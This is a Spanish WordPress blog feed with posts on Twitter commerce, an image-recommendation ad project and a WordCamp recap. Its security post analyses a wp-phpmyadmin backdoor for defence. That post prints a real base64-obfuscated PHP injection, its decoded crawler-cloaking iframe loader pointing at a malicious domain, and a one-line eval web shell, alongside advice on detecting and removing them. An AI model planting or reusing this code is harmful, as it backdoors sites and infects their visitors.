﻿<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>onestic &#187; Sergio Nieto</title>
	<atom:link href="http://onestic.com/author/snieto/feed/" rel="self" type="application/rss+xml" />
	<link>http://onestic.com</link>
	<description>Estrategia y desarrollo ecommerce</description>
	<lastBuildDate>Thu, 17 May 2012 15:54:36 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Chirpify: vender en Twitter en 140 caracteres</title>
		<link>http://onestic.com/el-comercio-electronico-llega-twitter/</link>
		<comments>http://onestic.com/el-comercio-electronico-llega-twitter/#comments</comments>
		<pubDate>Tue, 20 Mar 2012 09:37:42 +0000</pubDate>
		<dc:creator>Sergio Nieto</dc:creator>
				<category><![CDATA[Ecommerce]]></category>

		<guid isPermaLink="false">http://onestic.com/?p=1461</guid>
		<description><![CDATA[Twitter se ha convertido en una herramienta de márketing y atención al cliente muy útil en estos últimos tiempos. Sin embargo, con la popularización de la red social de los 140 caracteres, implantar el comercio electrónico al alcance de un tuit se había convertido en una obsesión en el sector. Ahora, una plataforma ya lo [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Twitter</strong> se ha convertido en una herramienta de márketing y atención al cliente muy útil en estos últimos tiempos. Sin embargo, con la popularización de la red social de los 140 caracteres, implantar el <strong>comercio electrónico</strong> al alcance de un tuit se había convertido en una obsesión en el sector.</p>
<p>Ahora, una plataforma ya lo ha conseguido. <a title="Chirpify" href="http://chirpify.com" target="_blank"><strong>Chirpify</strong></a> ha lanzado un sistema que ayudará a las tiendas online a promocionar y comercializar sus productos a través de la red social. Chirpify convierte los tuits en transacciones, permitiendo compras en tiempo real y lo que es más importante, en un sólo paso.</p>
<p><img class="alignnone  wp-image-1452" title="Chirpify: comercio electrónico en Twitter" src="http://onestic.com/wp-content/uploads/2012/03/chirpify-1024x436.jpg" alt="Comerciar en Twitter" width="802" height="356" /></p>
<p>El sistema es simple, y lo es para ambas partes: el comprador <a title="Registro en Chirpify" href="http://chirpify.com/signup" target="_blank">registra su cuenta</a> de Twitter en Chirpify, la conecta a PayPal, ofrece una dirección de envío, y a partir de entonces, estará a un sólo tuit de comprar los productos o servicios que ofrezcan las empresas presentes en Chirpify. Cuando una empresa ofrece un producto en Twitter, basta con contestar con la palabra &#8220;<em>buy&#8230;</em>&#8220;  y todo el engranaje de compra se activará. Sin hacer nada más. Es el <strong>Ecommerce</strong> llevado a la sencillez extrema, y con la seguridad que ofrece este tipo de pagos.</p>
<p>Para las <a title="Chirpify para empresas" href="http://chirpify.com/twitter_commerce/brands" target="_blank">tiendas de Ecommerce</a>, disponemos de una versión gratuita (<em>Basic</em>), con la que tendremos que pagar el 4% de nuestras ventas, comisión de PayPal a parte. Si queremos reducir esa tasa hasta el 2%, podemos pagar 49 dólares al año. Para eliminarla completamente, en el caso de que tengamos una gran facturación, la versión <em>Enterprise</em> nos costará alrededor de 500 dólares mensuales.</p>
<p>El mecanismo es sencillo: se cuelga un tuit con el nombre del producto y una foto, y lo ponemos así al alcance del cliente. Además, se puede integrar a la perfección con nuestra tienda online de la web.</p>
<p><a href="http://onestic.com/wp-content/uploads/2012/03/pantallazo-chirpify.jpg"><img class="wp-image-1671 alignleft" style="margin-right: 15px;" title="Chirpify para empresas" src="http://onestic.com/wp-content/uploads/2012/03/pantallazo-chirpify-802x356.jpg" alt="Registro vendedores Chirpify" width="407" height="187" /></a>Por fin, estamos ante un <strong>sistema para capitalizar los followers</strong> que tengamos. Twitter es un escaparate continuo de nuestros productos y nuestra imagen de marca, y vendiendo a través de esta red social estamos creando un círculo que se retroalimenta: los potenciales clientes seguirán nuestra cuenta porque comprar allí será fácil, y entonces podremos dirigirlos también a la tienda online de nuestra web a través de enlaces en los tuits.</p>
]]></content:encoded>
			<wfw:commentRss>http://onestic.com/el-comercio-electronico-llega-twitter/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>IFashion, proyecto de innovación de publicidad online inteligente</title>
		<link>http://onestic.com/ifashion-proyecto-de-innovacion-de-publicidad-online-inteligente-que-recomienda-productos-similares/</link>
		<comments>http://onestic.com/ifashion-proyecto-de-innovacion-de-publicidad-online-inteligente-que-recomienda-productos-similares/#comments</comments>
		<pubDate>Thu, 26 Jan 2012 17:41:20 +0000</pubDate>
		<dc:creator>Sergio Nieto</dc:creator>
				<category><![CDATA[Onestic]]></category>

		<guid isPermaLink="false">http://onestic.com/?p=1083</guid>
		<description><![CDATA[IFashion es un proyecto en el que Onestic está trabajando en estrecha colaboración con el Instituto Tecnológico AIDO, y presenta una innovación importante en el campo de la publicidad en Internet y en medios audiovisuales por su aplicación como recomendador inteligente de productos mediante procesado de imágenes. En concreto, el proyecto IFashion permitirá la selección [...]]]></description>
			<content:encoded><![CDATA[<p><strong>IFashion </strong>es un proyecto en el que <strong>Onestic </strong>está trabajando en estrecha colaboración con el <a href="http://aido.es/" target="_blank">Instituto Tecnológico AIDO</a>, y presenta una innovación importante en el campo de la publicidad en Internet y en medios audiovisuales por su aplicación como recomendador inteligente de productos mediante procesado de imágenes.</p>
<p>En concreto, el <a href="http://aido.es/proyectos/i/102845/622/ifashion-un-sistema-de-publicidad-online-basado-en-la-recomendacion-inteligente-de-productos-a-traves-del-procesamiento-">proyecto IFashion</a> permitirá la selección e interacción de imágenes o videos al cualquier usuario de Internet, con el objetivo de obtener información, participar en acciones, y tener la posibilidad de comprar productos que esté visualizando en ese momento en el elemento audiovisual.</p>
<p>Este nuevo sistema permitirá realizar el tracking de productos y objetos, con el ambicioso objetivo de conseguir un algoritmo de recomendación de artículos que favorezca el proceso de compra online, aumente la conversión y los ratios de compra, y la satisfacción general del cliente gracias a la sencillez y comodidad en el proceso.</p>
<p><a href="http://onestic.com/wp-content/uploads/2012/01/fashion.jpg"><img class=" wp-image-1281 alignleft" title="fashion" src="http://onestic.com/wp-content/uploads/2012/01/fashion-230x158.jpg" alt="" width="230" height="158" /></a>Como innovación a añadir al abanico de recursos en publicidad online, este sistema tendrá la posibilidad de abrir una nueva vía para <strong><a href="http://onestic.com">potenciar el comercio electrónico en España</a></strong>, especialmente en el caso de marcas fabricantes de moda: Complementar la <strong>presencia online de las marcas</strong>, reforzar acciones de branding, permitir al cliente comprar un producto que esté visualizando en video o imagen en cualquier tipo de <a href="http://onestic.com/servicios/#Tiendas con Magento">plataforma ecommerce</a> son sólo algunas de las posibles aplicaciones que tendrá el proyecto IFashion.</p>
<p>Una de las múltiples integraciones que esta tecnología puede tener lugar lo vemos en sites y comunidades de moda online del estilo de <a href="http://chicisimo.es">Chicisimo.com</a> (donde las usuarias publican fotos de cómo van vestidas y comparten sus gustos), mediante la integración de la venta de productos en los looks gracias al <strong>reconocimiento inteligente de prendas y complementos</strong>.</p>
<p>Este tipo de aplicación de la plataforma <strong>IFashion</strong> no sólo tendrá un <strong>uso directo en comercio electrónico</strong>, proporcionando un canal orgánico de &#8220;social shopping&#8221; al convertir a las usuarias en prescriptoras directas de las marcas, si no que presentará múltiples variantes en lo relativo a la explotación de datos que situarán a IFashion como una plataforma altamente atractiva para las marcas.</p>
<p>Más allá del sector de la moda, la plataforma IFashion tiene aplicaciones en otros sectores como el de la electrónica, la alimentación, bricolaje, mobiliario, etc.</p>
<p>En los próximos meses estará disponible una versión beta para plataformas de comercio electrónico de esta tecnología. Estará especialmente indicado para tiendas online con un extenso catálogo, que quieran disponer de un recomendador avanzado de productos para sus clientes. La adaptación e integración se personalizará en cada proyecto estudiando sus características, la clasificación de productos y los atributos que los definen, así como el comportamiento de los usuarios como <strong>cross-selling</strong> y para conseguir un resultado lejos del alcance de otras herramientas disponibles actualmente en el mercado.</p>
<p style="text-align: center;"><img class="size-medium wp-image-1282 aligncenter" title="logo-aido" src="http://onestic.com/wp-content/uploads/2012/01/logo-aido-230x121.jpg" alt="" width="230" height="121" /></p>
<p>Este proyecto ha sido financiado por el Instituto de la Pequeña y Mediana Industria de la Generalitat Valenciana (<a href="http://www.impiva.es" target="_blank">IMPIVA</a>) y por el Fondo Europeo de Desarrollo Regional de la Unión Europea (<a href="http://europa.eu/legislation_summaries/employment_and_social_policy/job_creation_measures/l60015_es.htm" target="_blank">FEDER</a>).</p>
<p><a href="http://impiva.es/" target="_blank"><img class="wp-image-1096 alignnone" title="impiva" src="http://onestic.com/wp-content/uploads/2012/01/impiva.jpg" alt="" width="200" height="37" /></a><a href="http://europa.eu/legislation_summaries/employment_and_social_policy/job_creation_measures/l60015_es.htm" target="_blank"><img class="wp-image-1095 alignright" title="feder" src="http://onestic.com/wp-content/uploads/2012/01/feder.jpg" alt="" width="180" height="72" /></a></p>
<p>Foto <a href="http://www.flickr.com/photos/coutorture/1485974577/" target="_blank">Courtorture</a></p>
]]></content:encoded>
			<wfw:commentRss>http://onestic.com/ifashion-proyecto-de-innovacion-de-publicidad-online-inteligente-que-recomienda-productos-similares/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Puerta trasera en el plugin de wp-phpmyadmin</title>
		<link>http://onestic.com/puerta-trasera-en-el-plugin-de-wp-phpmyadmin/</link>
		<comments>http://onestic.com/puerta-trasera-en-el-plugin-de-wp-phpmyadmin/#comments</comments>
		<pubDate>Mon, 22 Aug 2011 10:22:23 +0000</pubDate>
		<dc:creator>Sergio Nieto</dc:creator>
				<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://onestic.com/?p=1061</guid>
		<description><![CDATA[En los últimos meses hemos sido testigos de un ataque similar sobre algunos blogs a los que tenemos acceso. WordPress hackeado, con un iframe al comienzo de las páginas y que los buscadores no detectaban como página peligrosa. Sólo algunos antivirus de los usuarios se daban cuenta del ataque. Y el culpable (o donde residía [...]]]></description>
			<content:encoded><![CDATA[<p>En los últimos meses hemos sido testigos de un <strong>ataque </strong>similar sobre  algunos blogs a los que tenemos acceso. <strong>WordPress hackeado</strong>, con un  <strong>iframe al comienzo de las páginas</strong> y que los buscadores no detectaban  como página peligrosa. Sólo algunos antivirus de los usuarios se daban  cuenta del ataque. Y el culpable (o donde residía la backdoor) era el plugin de wp-phpmyadmin.<br/><br/></p>
<p>El plugin de <strong>wp-phpmyadmin</strong> tiene una utilidad importante cuando no tienes acceso de otro modo a la base de datos de tu instalación de WordPress. Pero el precio que se puede pagar por usarlo, después de haber comprobado la <strong>vulnerabilidad</strong> que trae consigo, es bastante alto.<br/><br/></p>
<p>El plugin no se actualiza desde el 2007 (con wp 1.5), no se puede encontrar en el repositorio oficial de plugins de WordPress (<a href="http://wordpress.org/extend/plugins/" target="_blank">http://wordpress.org/extend/plugins/</a>), y lo más importante: se había conseguido introducir un fichero dentre el resto de ficheros del plugin que abría una puerta trasera a nuestro sistema.<br/><br/></p>
<p>Pero vamos por partes y a explicar cómo funciona este <strong>hack de WordPress</strong> con detalle:<br/><br/></p>
<p>El ataque consistía en introducir en los ficheros index.php una línea justo detrás del primer &lt;?php . Aquí tenemos un ejemplo:<br/><br/></p>
<pre class="brush: php; title: ; notranslate">
&lt;?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly8yZ3V2a2w1NW9mLmNvLnR2Lz9nbz0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2lmcmFtZT4nOw0KfQ==');
</pre>
<p>Este código codificado, daba el siguiente fragmento de php tras decodificarlo, fragmento que acababa pintando un <strong>iframe antes de la etiqueta &lt;?html&gt;?</strong> en los blog al pasarlo por la función eval():<br/><br/></p>
<pre class="brush: php; title: ; notranslate">
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
 array(&quot;216.239.32.0&quot;,&quot;216.239.63.255&quot;),
 array(&quot;64.68.80.0&quot;  ,&quot;64.68.87.255&quot;  ),
 array(&quot;66.102.0.0&quot;,  &quot;66.102.15.255&quot;),
 array(&quot;64.233.160.0&quot;,&quot;64.233.191.255&quot;),
 array(&quot;66.249.64.0&quot;, &quot;66.249.95.255&quot;),
 array(&quot;72.14.192.0&quot;, &quot;72.14.255.255&quot;),
 array(&quot;209.85.128.0&quot;,&quot;209.85.255.255&quot;),
 array(&quot;198.108.100.192&quot;,&quot;198.108.100.207&quot;),
 array(&quot;173.194.0.0&quot;,&quot;173.194.255.255&quot;),
 array(&quot;216.33.229.144&quot;,&quot;216.33.229.151&quot;),
 array(&quot;216.33.229.160&quot;,&quot;216.33.229.167&quot;),
 array(&quot;209.185.108.128&quot;,&quot;209.185.108.255&quot;),
 array(&quot;216.109.75.80&quot;,&quot;216.109.75.95&quot;),
 array(&quot;64.68.88.0&quot;,&quot;64.68.95.255&quot;),
 array(&quot;64.68.64.64&quot;,&quot;64.68.64.127&quot;),
 array(&quot;64.41.221.192&quot;,&quot;64.41.221.207&quot;),
 array(&quot;74.125.0.0&quot;,&quot;74.125.255.255&quot;),
 array(&quot;65.52.0.0&quot;,&quot;65.55.255.255&quot;),
 array(&quot;74.6.0.0&quot;,&quot;74.6.255.255&quot;),
 array(&quot;67.195.0.0&quot;,&quot;67.195.255.255&quot;),
 array(&quot;72.30.0.0&quot;,&quot;72.30.255.255&quot;),
 array(&quot;38.0.0.0&quot;,&quot;38.255.255.255&quot;)
 );
$my_ip2long = sprintf(&quot;%u&quot;,ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
 $first_d=sprintf(&quot;%u&quot;,ip2long($IPs[0])); $second_d=sprintf(&quot;%u&quot;,ip2long($IPs[1]));
 if ($my_ip2long &gt;= $first_d &amp;&amp; $my_ip2long &lt;= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
 if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '&lt;iframe src=&quot;http://2guvkl55of.co.tv/?go=1&quot; width=&quot;1&quot; height=&quot;1&quot;&gt;&lt;/iframe&gt;';
}
</pre>
<p>Este iframe se intentaba ocultar a los robots de los buscadores y de rastreadores importantes para evitar que saltasen las alarmas de estos, y pusiesen en aviso al dueño del blog mediante alarmas al correo electrónico, bloqueos de su página desde la página de resultados de búsqueda, etc. Así podía permanecer el mayor tiempo posible estando oculto.<br/><br/></p>
<p>El contenido del iframe cargaba una direccion de un servidor (todos los distintos dominios que hemos podido comprobar estaban en Rumanía), donde se podía pintar cualquier cosa, seguramente<strong> troyanos javascript</strong> que comprometiesen la seguridad del usuario que visitase la web.<br/><br/></p>
<p><br/><br/><br />
<h3>Cómo saber si tengo esta puerta trasera en mi sistema, y como solucionarlo (detección, solución y prevención):</h3>
<p><br/></p>
<p>- Comprobar si tenemos el plugin de <strong>wp-phpmyadmin</strong>, y buscar el fichero <strong>phpmyadmin/upgrade.php</strong> dentro del mismo. Renombrar la extensión o eliminar este fichero, sobre todo si tiene dentro unas instrucciones parecida a estas:<br/><br/></p>
<pre class="brush: php; title: ; notranslate">
&lt;?php if(isset($_REQUEST[&quot;asc&quot;]))eval(stripslashes($_REQUEST[&quot;asc&quot;])); ?&gt;
</pre>
<p>- Buscar en el resto de ficheros de wp-content la cadena &#8216;<strong>eval(stripslashes</strong>&#8216; (por ejemplo), y comprobar en los resultados si alguno se parece a la línea anterior.<br/><br/></p>
<p>- Mantener una<strong> política estricta de permisos</strong> sobre los ficheros de la instalación de WordPress. Si los ficheros index.php hubiesen estado correctamente configurados en cuanto a permisos, tal y como aconsejan en <a href="http://codex.wordpress.org/Hardening_WordPress" target="_blank">http://codex.wordpress.org/Hardening_WordPress</a> la infección se hubiese podido evitar.<br/><br/></p>
<p>- Por supuesto, mantener nuestros <strong>plugins actualizados</strong>, junto con la <strong>última versión de WordPress siempre instalada</strong>. Y si alguno de los plugins deja de tener soporte o no se continúa su desarrollo, mejor optar por descartarlo y comenzar a buscar un sustituto del mismo.<br/><br/></p>
<p>Más info:<br/><br/></p>
<p><a href="http://blog.sucuri.net/2011/06/wp-phpmyadmin-wordpress-plugin-delete-it-now.html" target="_blank">http://blog.sucuri.net/2011/06/wp-phpmyadmin-wordpress-plugin-delete-it-now.html</a><br/><br/></p>
<p><a href="http://www.wpsecuritylock.com/wp-phpmyadmin-plugin-hacked-backdoor-vulnerability/" target="_blank">http://www.wpsecuritylock.com/wp-phpmyadmin-plugin-hacked-backdoor-vulnerability/</a><br/><br/></p>
<p>Especial cuidado también con los plugins wptouch, addthis y w3-total-cache:<br/><br/><br />
<a href="http://wpmu.org/wordpress-security-exploit-found-upgrade-wptouch-addthis-and-w3-total-cache/" target="_blank">http://wpmu.org/wordpress-security-exploit-found-upgrade-wptouch-addthis-and-w3-total-cache/</a><br/><br/></p>
]]></content:encoded>
			<wfw:commentRss>http://onestic.com/puerta-trasera-en-el-plugin-de-wp-phpmyadmin/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Resumen de la Wordcamp Spain 2010</title>
		<link>http://onestic.com/resumen-de-la-wordcamp-spain-2010/</link>
		<comments>http://onestic.com/resumen-de-la-wordcamp-spain-2010/#comments</comments>
		<pubDate>Mon, 13 Dec 2010 10:19:00 +0000</pubDate>
		<dc:creator>Sergio Nieto</dc:creator>
				<category><![CDATA[Onestic]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[Automattic]]></category>
		<category><![CDATA[Wordcamp Spain]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://onestic.com/?p=954</guid>
		<description><![CDATA[La verdad es que como primera conclusión podemos decir que para nosotros, en la Wordcamp Spain 2010 se ha conseguido aumentar el nivel general del evento respecto al año pasado. Gracias a que hemos podido disfrutar de más gente de Automattic, como José Fontainhas que es ya un clásico, Karim Osman, Isaac Keyet (cofundador de [...]]]></description>
			<content:encoded><![CDATA[<p>La verdad es que como primera conclusión podemos decir que para nosotros, en la <strong>Wordcamp Spain 2010 </strong>se ha conseguido aumentar el nivel general del evento respecto al año pasado. Gracias a que hemos podido disfrutar de más gente de <a title="Automattic" href="http://automattic.com/" target="_blank">Automattic</a>, como <a title="Ze Fontainhas from Automattic" href="http://ze.fontainhas.com/" target="_blank">José Fontainhas</a> que es ya un clásico, <a title="Karim Osman from Automattic" href="http://kar.im/" target="_blank">Karim Osman</a>, <a title="Isaac Keyet from Automattic" href="http://www.isaackeyet.com/blog/" target="_blank">Isaac Keyet</a> (cofundador de IntenseDebate y ahora en plantilla), y también de la visita de <a title="Jeffrey Pearce from Woothemes" href="http://www.jeffikus.com/" target="_blank">Jeffrey Pearce</a> como representante de <a title="Wordpress themes" href="http://woothemes.com" target="_blank">Woothemes.com</a>.</p>
<p><a href="http://onestic.com/resumen-de-la-wordcamp-spain-2010/foto-de-grupo-de-la-wordcamp-spain-2010-little/" rel="attachment wp-att-960"><img class="alignnone size-large wp-image-960" title="foto-de-grupo-de-la-Wordcamp-Spain-2010" src="http://onestic.com/wp-content/uploads/2010/12/foto-de-grupo-de-la-Wordcamp-Spain-2010-little-880x326.jpg" alt="foto-de-grupo-de-la-Wordcamp-Spain-2010" width="880" height="326" /></a></p>
<p>Las ponencias fueron bastante interesantes para todo tipo de perfiles. Bien es cierto que para los usuarios de WordPress algunas fueron demasiado técnicas, y que para los desarrolladores avanzados otras charlas profundizaron poco o carecían de interés. Pero a pesar de que cualquier ponencia tiene cierto grado de autopromoción, ninguna fue un publireportaje.</p>
<p>En la primera, <strong><a title="Blog personal de Fernando Tellado" href="http://fernandotellado.com/" target="_blank">Fernando Tellado</a></strong> nos siguió descubriendo plugins y usos de WordPress curiosos. Fernando siempre está descubriendo a la comunidad hispana de WordPress utilidades y plugins que mucha gente no encontraría porque ni siquiera se plantea buscarlos. Pero él está atento, y desde ayudawordpress.com siempre tiene algo interesante que enseñar. Podéis encontrar <a title="Fernando Tellado en la Wordcamp Spain 2010" href="http://ayudawordpress.com/" target="_blank">la ponencia de Fernando Tellado aquí</a>.</p>
<p>La segunda fue para <strong>José Fontainhas</strong>, que expuso lo nuevo que viene con WordPress 3.1. Rápida y concisa. Según nos comentó lo mejor para <a title="Novedades de WordPress 3.1" href="http://codex.wordpress.org/Version_3.1" target="_blank">conocer las novedades  de WP3.1 es visitar la página oficial</a>.</p>
<p><strong><a title="Blog de Rafael Poveda" href="http://raven.es/" target="_blank">Rafael Poveda</a></strong>, de <a title="Mecus, desarrollo en WordPress" href="http://mecus.es/" target="_blank">Mecus</a>, nos explicó los entresijos de la creación rápida de temas con la nueva versión de WordPress 3.x. Temas elásticos, frameworks themes y temas hijos. Sobre todo, la idea de no reinventar la rueda creando temas desde cero sin pensar en que podemos aprovechar soluciones existentes mediante el uso de temas hijos, o temas específicos hipercustomizables.  <span style="text-decoration: line-through;">¡Sólo falta que cuelguen la presentación! <img src='http://onestic.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  </span><a title="Ponencia de Rafael Poveda en la Wordcamp" href="http://www.slideshare.net/bi0xid/rethinking-themes-mecus" target="_blank">Puedes encontrar su presentación aquí</a>.</p>
<p>Después fue el turno para <a title="Web de El señor Muñoz" href="http://www.senormunoz.es/" target="_blank">el SeñorMuñoz</a>, <strong>Fernando Muñoz</strong>, consultor SEO de profesión. Amplió la que nos ofreció el año pasado con unas nociones de SEO básicas pero imprescindibles a la hora de implementar temas de WordPress. Y para rematar nos mostró un amplio abanico de plugins para potenciar el aspecto SEO de un WordPress. <a title="Fernando Muñoz en la Wordcamp Spain 2010" href="http://www.senormunoz.es/SEO-MARBELLA/wordcamp-seo-plugins" target="_blank">Su presentación y su resumen la podéis encontrar en su web</a>.</p>
<p>Tras la comida tuvimos el gusto de escuchar a<strong> <a title="Blog personal de Luis Rull" href="http://luisrull.es/" target="_blank">Luis Rull</a></strong>, de <a title="Mecus, desarrollo en WordPress" href="http://mecus.es/" target="_blank">Mecus</a>, hablando de los distintos usos que se le puede dar a WordPress más allá de la creación de blogs. Y qué sorpresa la nuestra cuando presentó el proyecto de <a title="Chicisimo.com, tu comunidad sobre moda" href="http://chicisimo.com" target="_blank"><strong>Chicisimo.com</strong></a> que con tanta ilusión estamos llevando hacia delante junto con sus creadores, Gabriel Aldamiz y su mujer María Arenaza. No nos cansaremos de agradecer a Luis que pusiese a chicisimo.com como ejemplo de uso de extremo de WordPress para crear una comunidad alrededor de un nexo común para sus usuarios, como es la moda. Además nos enseño otros sites que usan WordPress, aunque no lo parezca. Su presentación, en <a title="Blog de Luis Rull" href="http://luisrull.es/2010/12/wordcamp-espana-2010-wordpress-como-cms.html" target="_blank">su blog personal</a>.</p>
<p><strong>Isaac Keyet</strong>, cofundador de IntenseDebate y ahora Coordinador del equipo de trabajo de desarrollos para dispositivos móviles de Automattic, nos introdujo a los temas específicos para este tipo de dispositivos y las herramientas principales que tenemos a nuestra disposición para usar WordPress en ellos.</p>
<p>Luego <strong>Karim Osman</strong>, también de Automattic, nos dio algunas pinceladas de los entresijos de una gran empresa como Automattic, de su historia y de hacia donde navegan en la actualidad. Siempre interesante que alguien tan simpático como Karim venga y te cuente como funciona una empresa que se ha hecho tan grande e importante en tan poco tiempo. Para tomar nota. <a title="Karim Osman en la Wordcamp Spain 2010" href="http://kar.im/2010/12/11/wordcamp-spain-presentation/" target="_blank">Su presentación la podéis encontrar en su web</a>.</p>
